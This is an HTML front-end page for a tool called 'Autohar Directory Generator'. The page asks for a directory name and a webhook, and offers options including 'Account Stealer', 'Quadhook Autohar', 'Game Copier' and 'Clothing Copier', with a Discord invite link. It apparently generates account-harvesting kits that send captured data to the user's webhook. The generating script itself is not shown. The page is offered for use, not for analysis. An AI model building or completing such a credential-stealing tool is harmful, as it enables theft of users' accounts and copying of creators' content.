<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Autohar Directory Generator</title>
    <link rel="stylesheet" type="text/css" href="style.css">
    <style>
        /* Text Overlay */
        .text-overlay {
            position: absolute;
            top: 15%;
            left: 50%;
            transform: translate(-50%, -50%);
            font-size: 20px;
            color: white;
            text-align: center;
            z-index: 2;
            animation: fadeIn 2s;
        }

        /* Input Container */
        .input-container {
            position: absolute;
            top: 40%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 2;
            color: white;
            text-align: center;
        }

        /* Input Field */
        #directoryInput,
        #webhookInput,
        #optionSelect {
            width: 300px;
            padding: 10px;
            border: 1px solid #ffffff;
            border-radius: 5px;
            background: rgba(255, 255, 255, 0.1);
            color: white;
            font-size: 18px;
            margin-bottom: 10px; /* Espacio entre inputs */
            transition: border-color 0.3s;
        }

        /* Button Styles */
        #generateButton {
            padding: 10px 15px;
            border: none;
            border-radius: 5px;
            background-color: #04AA6D; /* Color verde */
            color: white;
            font-size: 18px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        #generateButton:hover {
            background-color: #038a4d; /* Color más oscuro al pasar el mouse */
        }

        /* Navigation Styles */
        .navigation {
            position: absolute;
            top: 10%;
            left: 50%;
            transform: translate(-50%, -50%);
            color: black;
        }

        .nav-list {
            list-style: none;
            padding: 0;
        }

        .nav-list li {
            display: inline;
            margin: 0 10px;
        }

        .nav-list a {
            text-decoration: none;
            color: blue;
        }

        /* Folder Icon */
        .folder-icon {
            display: block;
            margin: 20px auto; /* Centra la imagen */
            width: 50px; /* Controla el tamaño */
            height: 50px; /* Controla el tamaño */
        }
    </style>
</head>

<body>
    <div class="navigation">
        <ul class="nav-list">
            <li><a href="javascript:void(0);" id="contactLink">Contact</a></li>
            <li><a href="https://discord.gg/MgCdjuyrXU" target="_blank" rel="noopener noreferrer">Discord</a></li>
        </ul>
    </div>

    <h1 class="text-overlay">Autohar</h1>
    <div class="input-container">
        <label for="directoryInput">Directory Name:</label>
        <input type="text" id="directoryInput" placeholder="Enter a directory name" required>

        <label for="webhookInput">Webhook:</label>
        <input type="text" id="webhookInput" placeholder="Enter webhook" required>

        <label for="optionSelect">Select Option:</label>
        <select id="optionSelect" required>
            <option value="quadhook">Quadhook Autohar (VERY, OP)</option>
            <option value="followBot">Follow Bot (Autohar, Normal)</option>
            <option value="gameCopier">Game Copier (Autohar, Normal)</option>
            <option value="clothingCopier">Clothing Copier (Autohar, Normal)</option>
            <option value="accountStealer">Account Stealer (Autohar, Normal)</option>
        </select>

        <button id="generateButton">Generate</button>
    </div>

    <img src="folder-icon.png" alt="Folder Icon" class="folder-icon">
    <canvas class="background"></canvas>

    <div id="copyMessage" class="copy-message" style="display: none;">Copied!</div>

    <!-- Required script -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/particlesjs/2.2.3/particles.min.js"></script>
    <script type="text/javascript" src="script.js"></script>
</body>

</html>
